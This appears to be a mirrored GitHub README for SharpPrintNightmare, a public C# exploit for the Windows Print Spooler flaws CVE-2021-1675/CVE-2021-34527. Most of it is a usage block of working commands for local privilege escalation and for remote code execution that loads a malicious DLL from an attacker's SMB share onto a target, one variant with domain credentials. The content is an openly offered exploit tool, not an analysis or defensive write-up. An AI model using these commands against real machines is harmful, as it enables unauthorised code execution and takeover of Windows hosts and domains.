1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-10-31 20:08:27 +00:00
CVE-2021-1675/SharpPrintNightmare/README.md
cube0x0 56c1f8668e New python version with MS-PAR
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
2021-07-04 16:33:25 +02:00

29 lines
964 B
Markdown

# C# Implementation of CVE-2021-1675 / CVE-2021-34527
### Update
New `CVE-2021-1675.py` has been uploaded which will get the same result as the C# version
### Usage
The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
```
#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll
#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
```
![](../Images/poc4.png)
![](../Images/poc3.png)
### Acknowledgements
For contributing new ideas or exploit improvements, thanks to
* [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)